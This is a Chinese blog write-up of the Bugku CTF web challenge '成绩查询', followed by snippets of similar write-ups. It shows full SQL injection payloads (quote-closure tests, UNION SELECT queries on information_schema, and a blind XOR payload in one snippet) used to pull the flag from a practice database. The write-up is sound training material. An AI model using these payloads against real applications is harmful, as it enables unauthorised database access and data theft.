ctf-web-成绩查询

最新推荐文章于 2024-07-11 19:57:37 发布

榴莲蛋挞

最新推荐文章于 2024-07-11 19:57:37 发布

阅读量1.1k

点赞数 3

分类专栏： ctf 文章标签：网络安全前端 sql

本文链接：https://blog.csdn.net/god_001/article/details/124138219

版权

ctf 专栏收录该内容

32 篇文章 1 订阅

订阅专栏

题目：

打开网页：

一个提交页面，按提示输入1，2，3能够得到三个成绩单表格：如1时：

查看源代码：

发现，表单使用post方式提交，并且name="id"

猜测使用SQL注入

首先检测闭合方式：

分别post id=1' id=1"

发现post id=1"时，正常，post id=1'时无响应

应该是单引号 ' ' 闭合

再通过order by查询当前表列数：

于是可以判断出当前表具有4列

查询显示位置：

使用union select查询每一列数据显示位置

判断当前数据库包含的表名：

post

id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

查询表fl4g里的列名：

id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

查询列表fl4g对应skctf_flag列的数据：

id=-1' union select 1,2,3,skctf_flag from fl4g#

得到结果

这里注意使用union select注入时，id不能是存在的数值，因为程序在展示数据的时候通常只会取结果集的第一行数据，如果是已存在的数值，则想要的数据不会存于第一行，就无法显示

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

榴莲蛋挞

关注关注

3
点赞
踩
5

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

ctf刷题笔记之sql注入-union注入|bugku CTF：成绩查询

weixin_51614848的博客

08-18

1334

ctf刷题笔记

BugkuCTF-web-成绩单 writeup

kuller_Yan的博客

03-26

425

记一次简单的SQL注入题目传送门，点击即走首先分析题目：进入题目网页就可以看到这个遇到表单，当然要填一填，看看有什么变化。于是我根据题目提示输入1。仔细观察可以发现输入1，并且返回后，出现了龙龙龙的成绩单以及四份数据。于是打开hackbar，post提交正常返回，加 ’ 测试一下啥也不是，再加个 # 又正常了。那么基本可以认定是SQL注入无疑了。两种解题方法： 1：手...

参与评论您还未登录，请先登录后发表或查看评论

CTF练习题[WEB]-成绩查询

weixin_45246254的博客

01-05

1859

https://ctf.bugku.com/challenges/detail/id/84.html?page=4 拿到题目如下查询处考虑sql注入查询一下没有报错信息，直接把请求包丢到sqlmap里面发现union注入查看当前数据库查看数据表发现f14g表直接dump 获得flag ...

【C语言】C语言学生成绩管理系统（源码+报告）【千行代码】【独一无二】

最新发布

测试开发自动化

07-11

1410

学生成绩管理系统旨在提供一个高效且便捷的工具，用于管理学生、课程和选课信息，并生成和显示学生成绩单。系统主要包括以下功能模块：数据初始化模块：读取学生、课程和选课信息表文件，初始化系统数据。主菜单模块：显示主菜单，供用户选择操作。学生信息管理模块：添加、修改、删除和查询学生信息。课程信息管理模块：添加、修改、删除和查询课程信息。选课信息管理模块：添加、修改、删除和查询选课信息。成绩单管理模块：根据选课信息和课程信息生成学生成绩单，并支持显示和排序功能。数据存储模块：将当前的学生信息、课程信息和

BUGkuCTF-成绩查询

dfhjlll的博客

12-21

660

输入1 出来界面,猜测应该是sql注入,看源码是post注入, 输入id=1’,没有出来成绩单,是单引号注入加上注释符,然后使用union select 1,2,3,4一次次尝试,在输入5的时候没有成绩,猜测是5列,查出来库的名字后往下就是纯粹的sql注入了,查表,查列,就能查出来flag了 ...

bugku ctf 成绩查询解题思路

YouthBelief的博客

03-08

1112

0x00 环境地址 https://ctf.bugku.com/challenges/detail/id/84.html 成绩查询大概率sql注入 0x01 解题思路 1.1 根据提示输入1 2 3 测试正常数据 1 2 看来是根据id查询 1.2 测试是否报错（不产生报错） ' " ') ") % %) )) 等等 1.3 猜测sql语句为 select Math_score,English_score,Chinese_score from score_table where

Bugku CTF：成绩查询[WriteUP]

如有错误感谢斧正

11-25

352

看抓到的包最下面是id，选择注入点为：id进行注入。这里我把包信息txt保存为post.txt。复制Raw内容进txt文件用于sql注入。直接展示skctf_flag中的值即可。很明显应该就是‘skctf’

SQLi-CTF-master.zip

04-09

SQL注入（SQL Injection，简称SQLi）是一种常见的网络安全漏洞，主要出现在使用了不安全的SQL语句构建的应用程序中。...通过学习和实践，可以提升对网络安全的理解，并在CTF比赛中取得更好的成绩。

Bugku-web之成绩查询

weixin_42939822的博客

03-14

3476

今天是一道地地道道的sql注入题目，通过手动注入不仅可以加深对于sql语句的应用，也能够通过实战了解sql语句的运作，更好地体会到sql注入漏洞存在的潜在危害！！！ctf小白之旅继续前行！！！

CTF|BugkuCTF-WEB解题思路

这里是一处长期不更新的博客

06-15

1980

截止至练习题【login4】，仅提供解题思路。 WEB2 按F12直接可得flag 计算器：直接按F12，将maxlength修改，输入正确结果即可得到flag web基础$_GET URL输入：http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具，按F12，打开Post data，传递what=flag。矛盾这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.

CTF-Web-SQL注入

beihai2013

01-26

3293

题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注题目来源：强网杯2019 题目链接：https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察：堆叠注入，sql的show语句，sql的预编译，sql修改表参考：https:/

web成绩查询系统

05-13

数据库集成查询数据检索基与WEN的成绩查询系统

成绩查询系统

02-26

软件效益： 1、本系统为考生查询自己的成绩提供了方便。 2、本系统为班主任，和考试单位提供成绩查询提供了方便。 3、新增班主任管理。 4、教导处统一管理成绩，班主任只可以查本班的成绩，学生只可以查本人成绩。 5、可以多次批量导入成绩。用户使用方法： 1、用户可以根据自己的报考信息查询成绩，譬如依靠考号和姓名。 2、用户可以输入自己的电子邮箱订阅成绩查询信息，系统会在公布成绩后给你发邮件，告诉您最新的成绩查询公告。管理员使用方法： 1、管理员根据考试需求，制出excel样表。 2、管理员根据excel样表，和查询条件，对程序代码进行局部改动。 3、管理员把和样表格式一致的成绩信息表excel汇总出来。 4、管理员后台直接导入到数据库，学生和考生就可以使用成绩查询系统了。 5、管理员通过群发邮件，告诉订阅考试信息的学生成绩公告。管理员帐号入口：进入管理用户名：admin 密码：123456a

ctfquery:CTF数据查询命令行工具

05-19

ctfquery 查询CTF以获取特定信息。用法 ctfquery [ -s SYM | -t TYPE_ID | -c TYPE_ID | -l LABEL | -v | -h ] <file> -s SYM搜索名为SYM的符号 -S TYPE_ID搜索类型为TYPE_ID所有符号 -t TYPE_ID搜索以TYPE_ID标识的类型 -c TYPE_ID用头顶用TYPE_ID标识的-c TYPE_ID解决typedef链 -l LABEL搜索名称为LABEL -v打印文件的CTF版本 -h打印帮助消息建造 $ ninja 依存关系例子 ...或最大进程ID的故事握住我的手，我们要去旅行！说，由于某种原因，我们完全了解内核符号pid_max ，该符号表示系统上的最大PID。当然，一种方法是调查源，但是如果它不可用，而我们陷入一些随机的黑匣子故障转储中，该怎么办？ ctf

[WUSTCTF2020]颜值成绩查询

Yb_140的博客

11-03

176

sql盲注

bugku ctf 成绩单 (类似sql注入)

qq_42777804的博客

08-15

1045

原始界面与以往的sql注入不同，直接在成绩查询栏中注入随便输入数字发现居然会出现显示位之后猜测应该有3个以上的显示位，因为成绩就已经有了3个 ?id=1' union select 1,2,3# 发现没有反应那么就四个 ?id=1' union select 1,2,3,4# 发现了4个，那我们就用最后一个先...

[WUSTCTF2020]颜值成绩查询（布尔注入）

记录学习，一起进步

01-27

806

[WUSTCTF2020]颜值成绩查询（布尔注入）

buuctf-颜值成绩查询(sql注入)

一直在水些技术小文

05-19

570

输入1-4都是可以的，从5开始就不存在了多半就是sql注入，但是限制了输入的数据，就只能用报错注入或者盲注了但尝试后发现，报错注入、布尔盲注和时间盲注都不行，都回显not exists 尝试一下异或注入输入10正确，1错误，说明是异或注入 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1 这是正确的结果错误的结果是这样的通过这个可以最终得到f..

BUGKU CTF--web 基础{成绩查询}

lulu001128的博客

12-03

919

BUGKU CTF--web 基础{成绩查询}解题过程

ctf web 思维导图

12-18

CTF（Capture The Flag）是一种网络安全竞赛，其中的Web领域涉及到了网页应用程序的漏洞挖掘和利用。下面是CTF Web思维导图的简要解释： CTF Web思维导图主要分为三个方面：Web漏洞类型、漏洞利用技术和解题方法。 Web漏洞类型包括：注入漏洞（如SQL注入、命令注入）、跨站脚本漏洞（XSS）、跨站请求伪造漏洞（CSRF）、文件上传漏洞、路径遍历漏洞等。这些漏洞常见于Web应用程序的开发不规范或配置不当，攻击者可以通过利用这些漏洞来获取无授权的访问或者控制目标系统。漏洞利用技术主要包括：代码注入（如SQL注入、远程命令执行）、会话劫持与干扰（如会话劫持、会话劫持预防、会话干扰攻击）、文件包含与遍历、信息泄露利用（如敏感信息泄露、漏洞利用）、中间人攻击、点击劫持等。这些技术是攻击者在发现漏洞后利用漏洞实施攻击的具体方法。解题方法主要包括：寻找目标站点、分析目标站点、漏洞检测与利用、数据包截获与分析、Webshell的利用与部署、绕过访问控制（如绕过IP限制、用户认证绕过）、漏洞修复与防御等。这些方法是CTF比赛中参赛者通过解题来获取Flag的具体步骤。综上所述，CTF Web思维导图涵盖了Web漏洞类型、漏洞利用技术和解题方法。掌握这些知识和技能能够帮助参赛者更好地分析和利用Web漏洞，从而在CTF比赛中取得优异的成绩。